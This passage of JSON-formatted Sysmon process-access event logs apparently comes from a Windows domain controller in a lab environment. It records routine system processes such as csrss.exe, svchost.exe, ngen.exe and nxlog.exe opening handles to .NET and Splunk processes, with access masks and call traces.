\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6968,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:37.008\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12D9-5F25-0000-0010C5FA0900}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:37.008","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12D9-5F25-0000-0010C5FA0900}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6969,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:37.008\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12D9-5F25-0000-0010C5FA0900}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:37.008","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12D9-5F25-0000-0010C5FA0900}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6970,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:37.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:37.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6971,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:37.680\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12D9-5F25-0000-0010A8FE0900}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:37.680","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12D9-5F25-0000-0010A8FE0900}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6972,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:37.680\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12D9-5F25-0000-0010A8FE0900}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:37.680","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12D9-5F25-0000-0010A8FE0900}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6973,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:37.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12D9-5F25-0000-0010A8FE0900}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:37.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12D9-5F25-0000-0010A8FE0900}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6974,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:38.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:38.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6975,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:39.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:39.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files 